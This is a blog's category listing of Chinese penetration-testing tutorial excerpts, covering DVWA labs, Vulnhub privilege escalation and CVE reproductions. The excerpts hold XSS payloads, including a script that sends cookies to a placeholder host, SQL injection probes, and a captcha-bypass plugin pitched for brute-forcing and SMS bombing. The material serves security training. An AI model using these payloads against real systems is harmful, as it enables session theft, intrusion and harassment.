渗透测试
文章平均质量分 78
Tigirs
Tigirs's blog
展开
-
使用BP插件captcha-killer识别图片验证码&绕过系统验证码机制
利用bp插件captcha-killer识别图片验证码&绕过系统验证码机制,可用于有验证码机制的账密bao po,短信hong zha等原创 2023-08-14 14:40:23 · 1507 阅读 · 2 评论 -
【DVWA系列】十四、JavaScript 攻击(源码分析&漏洞利用)
文章目录DVWACSP Bypass 绕过浏览器的安全策略一、Low 级别二、High 级别三、Medium 级别四、Impossible 级别DVWACSP Bypass 绕过浏览器的安全策略一、Low 级别点击submit,发现页面返回“You got the phrase wrong.”页面提示需要我们提交单词success,将输入框单词改为success,点击submit,后台返回“Invalid token.”查看网页源代码:发现token是在前端生成的, token=md5原创 2021-03-13 10:56:35 · 1036 阅读 · 0 评论 -
【DVWA系列】十三、CSP Bypass 绕过浏览器的安全策略(源码分析&漏洞利用)
文章目录DVWACSP Bypass 绕过浏览器的安全策略一、Low 级别二、Medium 级别三、High 级别四、Impossible 级别DVWACSP Bypass 绕过浏览器的安全策略什么是CSP?CSP即Content-Security-Policy,是指HTTP返回报文头中的标签,浏览器会根据标签中的内容,判断哪些资源可以加载或执行。翻译为中文就是内容安全策略。是为了缓解潜在的跨站脚本问题(XSS),浏览器的扩展程序系统引入了内容安全策略这个概念,原来应对XSS攻击时,主要采用函数过原创 2021-03-13 10:56:25 · 1194 阅读 · 0 评论 -
【DVWA系列】十二、XSS(Stored) 存储型XSS(源码分析&漏洞利用)
文章目录DVWAXSS(Reflected) 反射型XSS一、Low 级别二、Medium 级别三、High 级别四、Impossible 级别DVWAXSS(Reflected) 反射型XSS一、Low 级别对输入没有进行任何XSS过滤输入 <script>alert('xss')</script>,js代码执行:网页源代码,显示的数据是调用数据库里的数据:源代码:<?phpif( isset( $_POST[ 'btnSign' ] ) ) {原创 2021-03-13 10:56:15 · 1041 阅读 · 0 评论 -
【DVWA系列】十一、XSS(Reflected) 反射型XSS(源码分析&漏洞利用)
文章目录DVWAXSS(Reflected) 反射型XSS一、Low 级别二、Medium 级别三、High 级别四、Impossible 级别DVWAXSS(Reflected) 反射型XSS一、Low 级别没有任何的安全防护措施输入 <script>alert('hack')</script>,直接就执行了我们的 js 代码:我们的js代码直接插入到了网页源代码中:源代码:<?phpheader ("X-XSS-Protection: 0");原创 2021-03-12 10:54:37 · 1133 阅读 · 0 评论 -
【DVWA系列】十、XSS(DOM) 基于DOM型的XSS(源码分析&漏洞利用)
文章目录DVWAXSS(DOM) 基于DOM的跨站脚本攻击一、Low 级别二、Medium 级别三、High 级别四、Impossible 级别DVWAXSS(DOM) 基于DOM的跨站脚本攻击一、Low 级别没有任何的安全保护措施下拉框选择语言提交后,在url栏中的default参数直接显示:构造XSS代码,修改参数,成功执行脚本:?default=<script>alert('/xss/')</script>查看网页源代码,脚本插入到代码中,所以执行了原创 2021-03-12 10:54:28 · 1429 阅读 · 0 评论 -
【DVWA系列】九、Weak Session IDs 弱的会话id(源码分析)
文章目录DVWAWeak Session IDs 弱的会话id一、Low 级别二、Medium 级别三、High 级别四、Impossible 级别DVWAWeak Session IDs 弱的会话id用户访问服务器的时候,一般服务器都会分配一个身份证 session id 给用户,用于标识。用户拿到 session id 后就会保存到 cookies 上,之后只要拿着 cookies 再访问服务器,服务器就知道你是谁了;但是 session id 过于简单就会容易被人伪造。根本都不需要知道用户的原创 2021-03-12 10:54:07 · 454 阅读 · 0 评论 -
【DVWA系列】八、SQL Injection (Blind) SQL注入(盲注)(源码分析&漏洞利用)
文章目录DVWASQL Injection (Blind) SQL注入(盲注)一、Low 级别二、Medium 级别三、High 级别四、Impossible 级别DVWASQL Injection (Blind) SQL注入(盲注)SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一、Low 级别Low级别的代码对参数id没有做任何检查、过滤查询 id查询存在原创 2021-03-12 10:53:57 · 730 阅读 · 0 评论 -
【DVWA系列】七、SQL Injection SQL注入(源码分析&漏洞利用)
文章目录DVWASQL Injection SQL注入一、Low 级别二、Medium 级别三、High 级别四、Impossible 级别DVWASQL Injection SQL注入一、Low 级别对来自客户端的参数id没有进行任何的检查与过滤查询 id 为1判断注入是字符型还是数字型注入 1' 发现报错信息为:You have an error in your SQL syntax; check the manual that corresponds to your M原创 2021-03-12 10:53:35 · 1440 阅读 · 0 评论 -
【DVWA系列】六、Insecure CAPTCHA 不安全验证码
文章目录DVWAInsecure CAPTCHA 不安全验证码DVWAInsecure CAPTCHA 不安全验证码Insecure CAPTCHA,意思是不安全的验证码,CAPTCHA是Completely Automated Public Turing Test to Tell Computers and Humans Apart (全自动区分计算机和人类的图灵测试)的简称,这一模块的内容叫做不安全的验证流程更妥当些,因为这块主要是验证流程出现了逻辑漏洞;因为没有fanqiang,所以没能成功原创 2021-03-12 10:53:24 · 321 阅读 · 1 评论 -
【DVWA系列】五、File Upload 文件上传(源码分析&漏洞利用)
文章目录DVWAFile Upload 文件上传一、low 级别二、medium 级别三、high 级别四、impossible 级别DVWAFile Upload 文件上传一、low 级别对上传文件的类型、内容没有做任何的检查、过滤上传一句话木马文件:成功上传:蚁剑连接:源代码:<?phpif( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $targe原创 2021-03-12 10:53:06 · 837 阅读 · 0 评论 -
【DVWA系列】四、File Inclusion 文件包含(源码分析&漏洞利用)
文章目录DVWAFile Inclusion 文件包含一、low 级别二、medium 级别三、high 级别四、impossible 级别DVWAFile Inclusion 文件包含一、low 级别无任何安全防护措施观察url参数,通过点击页面的三个文件,确定包含文件的参数为 page:尝试修改参数,包含一个不存在的文件 page=test.php:可以看到,发生了报错,并且把网站的路径都给暴露出来了。尝试远程包含,在另一个服务器上搭建一个一句话木马文件,包含该文件:成功包原创 2021-03-12 10:52:40 · 419 阅读 · 0 评论 -
【DVWA系列】三、CSRF 跨站请求伪造(源码分析&漏洞利用)
文章目录DVWACSRF 跨站请求伪造一、low 级别二、medium 级别三、high 级别DVWACSRF 跨站请求伪造一、low 级别无安全防护措施,是判断两次输入的密码是否相同随便修改一下,观察到修改密码值提交到了url中(get型):password_new=1&password_conf=1&Change=Change#伪造一个网页,插入URL请求语句,修改密码为666,将它“修饰”一下:<html> <head> <t原创 2021-03-12 10:52:27 · 576 阅读 · 1 评论 -
【DVWA系列】二、Command Injection 命令注入(源码分析&python脚本实现&漏洞利用获取shell)
文章目录DVWACommand Injection 命令注入- 前言一、low级别二、medium级别三、high级别四、impossible级别五、漏洞利用- 获取目标shellDVWACommand Injection 命令注入- 前言命令拼接符:命令注入漏洞的利用,离不开命令拼接符a & b: a、b命令互不影响,各自执行;a && b: a命令执行成功后,才会执行b命令;a | b:a命令的输出作为 b 的输入(a命令不论真假都会执行b命令);a || b原创 2021-03-12 10:52:04 · 958 阅读 · 0 评论 -
【DVWA系列】一、Brute Force 暴力破解(源码分析&python脚本实现)
文章目录DVWABrute Force 暴力破解一、low级别二、medium级别三、high级别DVWABrute Force 暴力破解一、low级别无任何安全防护措施爆破方法:bp抓包 —> 发送到Intruder模块 —> 定义变量 —> 导入密码字典 —> 开始爆破根据长度可得密码:源代码:<?phpif( isset( $_GET[ 'Login' ] ) ) { // 获取用户名 $user = $_GET[ 'username'原创 2021-03-09 10:17:27 · 1677 阅读 · 3 评论 -
【漏洞复现】AppWeb认证绕过漏洞(CVE-2018-8715)
文章目录漏洞复现AppWeb认证绕过漏洞一、简述二、复现环境三、漏洞复现漏洞复现AppWeb认证绕过漏洞一、简述AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然最主要的应用场景还是为嵌入式设备提供Web Application容器。AppWeb可以进行认证配置,其认证方式包括以下三种:basic 传统HTTP基础认证;digest 改进版HTTP基原创 2021-02-08 17:59:50 · 445 阅读 · 0 评论 -
【Vulnhub靶机渗透测试】之DC-5(screen-4.5.0漏洞脚本提权)
文章目录Vulnhub靶机渗透测试之DC-51. 信息收集2. 漏洞利用3. 提权Vulnhub靶机渗透测试之DC-5环境搭建靶机镜像下载地址:https://www.vulnhub.com/entry/dc-5,314/;需要将靶机和kali攻击机放在同一个局域网里;kali的IP地址:192.168.40.142。1. 信息收集2. 漏洞利用3. 提权...原创 2020-12-29 17:21:45 · 1783 阅读 · 0 评论 -
【Vulnhub靶机渗透测试】之DC-4(teehee命令提权(在passwd或crontab中追加内容))
文章目录Vulnhub靶机渗透测试之DC-2Vulnhub靶机渗透测试之DC-2环境搭建靶机镜像下载地址:https://www.vulnhub.com/entry/dc-2,311/;需要将靶机和kali攻击机放在同一个局域网里;kali的IP地址:192.168.40.142。...原创 2020-12-28 18:49:06 · 1005 阅读 · 0 评论 -
【Vulnhub靶机渗透测试】之DC-2 (git命令提权)
文章目录Vulnhub靶机渗透测试之DC-21. 信息收集2. 漏洞利用3. 提权Vulnhub靶机渗透测试之DC-2环境搭建靶机镜像下载地址:https://www.vulnhub.com/entry/dc-2,311/;需要将靶机和kali攻击机放在同一个局域网里;kali的IP地址:192.168.40.142。1. 信息收集使用 nmap 扫描 192.168.40.0/24 网段存活主机发现靶机IP为:192.168.40.143。使用 nmap 扫原创 2020-12-27 21:28:26 · 732 阅读 · 0 评论 -
【Vulnhub靶机渗透测试】之DC-1 (SUID提权)
文章目录Vulnhub靶机渗透测试DC-11. 信息收集2. 漏洞利用Vulnhub靶机渗透测试DC-1环境搭建靶机镜像下载地址:https://www.vulnhub.com/entry/dc-1,292/;需要将靶机和kali攻击机放在同一个局域网里;kali的IP地址:192.168.40.131。1. 信息收集使用 nmap 扫描 192.168.40.0/24 网段存活主机nmap -sP 192.168.40.0/24简单分析可知,靶机ip为 192原创 2020-12-27 20:03:54 · 876 阅读 · 1 评论 -
【漏洞复现】PHP远程代码执行漏洞( CVE-2019-11043)
文章目录Vulhub漏洞复现PHP远程代码执行漏洞复现(CVE-2019-11043)一、漏洞概述二、漏洞复现Vulhub漏洞复现PHP远程代码执行漏洞复现(CVE-2019-11043)一、漏洞概述向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\原创 2020-12-27 20:03:26 · 493 阅读 · 0 评论 -
【漏洞复现】Apache Solr Velocity 注入远程命令执行漏洞(CVE-2019-17558)
文章目录Vulhub漏洞复现Apache Solr Velocity 注入远程命令执行漏洞复现一、漏洞概述二、漏洞复现1. 复现步骤Vulhub漏洞复现Apache Solr Velocity 注入远程命令执行漏洞复现一、漏洞概述Apache Solr 在其 5.0.0 到 8.3.1版本中,用户可以注入自定义模板,通过Velocity模板语言执行任意命令。二、漏洞复现1. 复现步骤使用vulhub中CVE-2019-17558的环境进行搭建https://vulhub.org/#/en原创 2020-12-27 20:03:16 · 937 阅读 · 0 评论 -
【漏洞复现】Apache Solr 远程命令执行漏洞(CVE-2019-0193)
文章目录Vulhub漏洞复现Apache Solr远程命令执行漏洞复现(CVE-2019-0193)一、漏洞概述二、漏洞复现1. 复现步骤2. 利用该漏洞getshellVulhub漏洞复现Apache Solr远程命令执行漏洞复现(CVE-2019-0193)一、漏洞概述Apache Solr搜索服务,它是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口,用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引(solr 中索引库用 core原创 2020-12-27 20:03:05 · 3589 阅读 · 2 评论 -
OWASP TOP 10(七)XXE漏洞(XML基本语法、DTD(声明类型、数据类型、实体)、XXE漏洞原理、PHP相关函数、XML注入读取文件、漏洞防御)
文章目录XML学习一、XML概述1. 简述2. XML和HTML的区别二、基本语法规则三、DTD1. 概述2. 声明类型- 内部的 DOCTYPE 声明- 外部文档声明3. 数据类型- PCDATA- CDATA4. 实体- 内部实体声明- 外部实体声明四、XEE1. 漏洞原理2. PHP相关函数- file_get_contents()- php://input- simplexml_load_string()3. XML注入回显 输出函数XML学习一、XML概述1. 简述XML 指可扩展标记语言原创 2020-12-27 20:02:37 · 732 阅读 · 0 评论 -
OWASP TOP 10(六)反序列化漏洞(序列化和反序列化、漏洞原理、PHP中的序列化和反序列化、魔术方法、Typecho_v1.0中的反序列化漏洞)
文章目录反序列化漏洞一、概述1. 序列化和反序列化2. 序列化的目的二、PHP中的序列化与反序列化1. 概述2. 示例序列化与反序列化3. 反序列化漏洞- PHP中的魔术方法- Typecho_v1.0中的反序列化漏洞反序列化漏洞一、概述1. 序列化和反序列化序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。也就是将数据结构或对象状态转换原创 2020-12-25 11:59:16 · 607 阅读 · 0 评论 -
Metasploit漏洞框架(详述强大的Metasploit、技术架构、Meterpreter的使用、优势、基本操作、服务查点、“永恒之蓝”演示)
文章目录Metasploit一、概述1. 简述2. 发展历史3. 技术架构- 辅助模块- 渗透攻击模块- 攻击载荷模块- 空指令模块- 编码器模块- 后渗透攻击模块- 免杀模块4. Metasploit的优势二、基本操作1. 启动MSF2. 情报搜集- 网站敏感目录扫描- 主机发现- 端口扫描- 探测服务详细信息- 服务查点1. telnet服务查点2. SSH服务查点3. MSSQL服务破解三、“永恒之蓝”漏洞演示1. 漏洞概述2. 实验步骤Metasploit一、概述1. 简述Metasploi原创 2020-12-24 14:04:58 · 3130 阅读 · 1 评论 -
提权(概述、水平/垂直越权、windows/linux提权、反弹shell、Linux_Exploit_Suggester、searchsploit)
文章目录提权一、概述1. 什么是提权?2. 水平越权&垂直越权3. 分类- windows1. 系统漏洞提权1.1 基于windows20031.2 基于windows2008- Linux提权一、概述1. 什么是提权?提权即提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得该服务器权限。2. 水平越权&垂直越权水平越权:指相同权限下不同的用户可以互相访问;垂直越权:指使用权限低的用户可以访问到权限较高的用户;比如:原创 2020-12-24 10:12:05 · 5723 阅读 · 0 评论 -
业务安全(概述、hacker攻击目标、测试流程、业务数据安全、dami商城5.4漏洞演示、密码找回安全(metinfov4.0案例)、DVWA Insecure CAPTCHA不安全验证码)
文章目录业务安全一、概述二、hacker攻击的目标三、业务安全测试流程1. 测试准备2. 业务调研3. 业务建模4. 业务流程梳理5. 业务风险点识别6. 开展测试7. 撰写报告业务安全一、概述近年来,随着信息化技术的迅速发展和全球一体化进程的不断加快,计算机和网络已经成为与所有人都息息相关的工具和媒介,个人的工作、生活和娱乐,企业的管理,乃至国家的发展和改革都无处其外。信息和互联网带来的不仅仅是便利和高效,大量隐私、敏感和高价值的信息数据和资产,成为恶意攻击者攻击和威胁的主要目标,从早期以极客为核心原创 2020-12-22 16:08:31 · 1375 阅读 · 1 评论 -
OWASP TOP 10(五)SSRF漏洞(概述、危害、php语言的SSRF、漏洞利用、weblogic ssrf漏洞复现、SSRF挖掘、防御、绕过限制IP)
文章目录OWASP TOP 10SSRF漏洞一、概述1. 简述2. 与CSRF区别3. SSRF危害二、PHP语言和curl扩展实现CSRF1. 实现了从服务器获取资源的基本功能2. 漏洞利用1. 访问正常文件2. 端口扫描3. 读取系统本地文件4. 内网Web应用指纹识别5. 攻击内网应用- Weblogic SSRF漏洞复现三、SSRF 漏洞的挖掘四、SSRF的防御OWASP TOP 10SSRF漏洞一、概述1. 简述互联网上的很多Web应用提供了从其他服务器(也可以是本地)获取数据的功能。使原创 2020-12-22 14:39:42 · 1080 阅读 · 0 评论 -
OWASP TOP 10(四)CSRF漏洞(概念、场景复现、GET/POST型、结合XSS、防御方法(referer、token、二次验证)、CSRFTester)
文章目录OWASP TOP 10CSRF漏洞一、概述1. 什么是CSRF?2. CSRF和XSS的区别3. CSRF场景复现3.1 场景一3.1 场景二4. CRSF的关键点和目标4.1 关键点4.2 目标5. CSRF类别5.1 GET型5.2 POST型二、案例:CSRF与XSS结合添加后台账号三、防御方法1. 无效的防御2. 有效的防御四、CSRF自动化探测OWASP TOP 10CSRF漏洞一、概述1. 什么是CSRF?跨站请求伪造(Cross-site request forgery),原创 2020-12-22 14:38:30 · 2273 阅读 · 0 评论 -
OWASP TOP 10(三)文件上传漏洞(概述、原理、webshell(大小马)、getshelll、upload-labs靶场、%00截断、.htaccess攻击、web容器解析/文件编辑器漏洞)
文章目录OWASP TOP 10文件上传漏洞一、概述1. 漏洞简述2. 漏洞成因3. 漏洞危害二、WebShell1. 概述2. 大马3. 小马3.1 概述3.2 一句话木马+中国蚁剑三、文件上传漏洞1. GetShell2. 利用的条件telnet模拟http请求3. 防御 | 绕过 | 利用黑白名单策略4. upload-labs靶场5. 前端限制与绕过6. 服务端检测6.1 检测MIME类型6.2 检测文件内容类型6.3 检测文件后缀名OWASP TOP 10文件上传漏洞一、概述1. 漏洞简述原创 2020-12-22 14:38:18 · 2616 阅读 · 0 评论 -
文件包含漏洞(概述、原理、特点、PHP中的文件包含漏洞、相关函数、本地/远程文件包含、漏洞利用、利用PHP封装协议、包含日志文件)
文章目录文件包含漏洞一、概述二、PHP中的文件包含漏洞相关1. PHP中的文件包含函数1.1 include()1.2 include_once()1.3 require()1.4 require_once()2. PHP相关配置3. 漏洞示例3.1 本地包含示例3.2 远程包含示例4. 漏洞原理5. 漏洞特点5.1 无视文件扩展名读取文件5.2 无条件解析PHP代码6. 空字符安全绕过三、漏洞利用1. 读取敏感文件2. 直接包含图片木马3. 包含木马写Shell4. 利用PHP封装协议4.1 访问本地文件原创 2020-12-22 14:38:05 · 903 阅读 · 0 评论 -
OWASP TOP 10(一)OS命令注入(概述、危害、PHP相关函数、漏洞利用、防御方法、DVWA的命令注入四个级别源码分析)
文章目录OWASP TOP 10OS命令注入一、概述二、漏洞危害三、相关函数1. system()2. exec()3. shell_exec()4. passthru()5. popen()6. 其他注入反引号``四、漏洞利用1. 查看系统文件2. 显示当前路径3. 写文件五、防御方法六、DVWA的命令注入1. low级别2. medium级别3. high级别4. impossible级别OWASP TOP 10OS命令注入一、概述程序员使用脚本语言(如PHP)开发应用程序过程中,脚本语言开发十原创 2020-12-15 22:45:11 · 1070 阅读 · 0 评论 -
OWASP TOP 10(一)PHP代码注入(概述、注入方式、漏洞利用(中国蚁剑获取shell、获取文件路径、读写文件)、防御方法、Seacms的php注入)
文章目录OWASP TOP 10PHP代码注入一、概述二、PHP相关函数&语句1. eval()2. assert()3. preg_replace4. call_user_func5. 动态函数 `$a($b)`三、漏洞利用1. 直接获取Shell2. 获取当前文件的绝对路径3. 读文件4. 写文件四、防御方法五、Seacms的php注入OWASP TOP 10PHP代码注入一、概述概述PHP代码注入(执行):在Web方面应用程序过滤不严,用户可以通过请求将代码注入到应用中执行。代原创 2020-12-15 22:45:00 · 804 阅读 · 1 评论 -
OWASP TOP 10(二)XSS漏洞(shellcode调用方法、XSS的利用)
文章目录OWASP TOP 10XSS漏洞shellcode的调用1. 远程调用2. windows.location.hash3. XSS Downloader4. 备选存储技术OWASP TOP 10XSS漏洞shellcode的调用shellcode就是在利用漏洞所执行的代码。完整的XSS攻击,会将shellcode存放在一定的地方,然后触发漏洞,调用shellcode。1. 远程调用这是比较常用的方式。将JS代码单独放在一个js文件中,然后通过http协议远程加载该脚本。如:<原创 2020-12-15 16:41:31 · 657 阅读 · 0 评论 -
OWASP TOP 10(二)XSS漏洞(盗取cookie、ms10_220_aurora漏洞、XSS平台)
文章目录OWASP TOP 10XSS一、XSS漏洞----cookie1. 盗取cookie2. 利用cookie会话劫持OWASP TOP 10XSS一、XSS漏洞----cookie1. 盗取cookie在DVWA靶场上演示。存在反射型XSS漏洞的站点位置可以利用以下链接来盗取Cookie。<script>document.location='http://ip/cookie.php文件的绝对路径?cookie='+document.cookie</script>原创 2020-12-15 16:41:22 · 600 阅读 · 1 评论 -
OWASP TOP 10(二)XSS漏洞(概述、PoC、分类、构造、变形绕过、XSS-Filter、xsser、xsstrike)
文章目录OWASP Top 10XSS一、概述二、XSS危害三、XSS相关四、使用PoC代码简单验证XSS漏洞五、XSS分类1. 反射型XSS2. 存储型XSS3. DOM型XSS六、XSS的构造1. 利用<>构造HTML或JS标签2. 伪协议3. 事件驱动七、XSS的变形1. 大小写转换2. 引号的使用3. 利用左斜线代替空格4. 添加Tab或回车符5. 对标签属性值进行转码6. 拆分跨站7. 双写绕过XSS练习平台OWASP Top 10XSS一、概述XSS被称为跨站脚本攻击(Cro原创 2020-12-15 16:40:58 · 2278 阅读 · 0 评论 -
DVWA靶场搭建
文章目录一、概述二、下载&安装&配置一、概述DVWA (Dam Vulnerable Web Application)DVWA是用PHP + Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、 盲注等常见的一些安全漏洞。二、下载&安装&配置下载地址:https://github.com/ethicalhack3r/DVWA/archive/master.zip解压,放置在phpstudy的www目录下配置数据库链原创 2020-12-15 10:50:37 · 1352 阅读 · 0 评论 -
OWASP TOP 10(一)SQL注入(SQLi-Labs(1-9)分析思路、半自动化注入)
文章目录SQL注入SQLi-LabsLess-1Less-2Less-3Less-4Less-5SQL注入SQLi-LabsLess-1字符型注入 | 单引号闭合 | 联合查询当我们传入参数 id=1 、id=2 … 页面回显不一样的内容:说明数据库中的数据可以回显到前端页面,然后需要考虑是字符型还是数字型注入,注入单引号后:页面回显报错信息You have an error in your SQL syntax; check the manual that correspo原创 2020-12-15 10:49:42 · 424 阅读 · 0 评论 -
OWASP TOP 10(一)SQL注入(自动化工具sqlmap)
文章目录sqlmap1. 概述2. 基本参数检测注入点列出所有数据库名列出当前数据库名列出数据库名表名列出表中字段名列出字段内容3. 读取post请求sqlmap1. 概述sqlmap是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器。它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。支持的数据库有:MySQL, Oracle, PostgreSQL, Microsoft SQL Serve原创 2020-12-14 11:52:21 · 1008 阅读 · 0 评论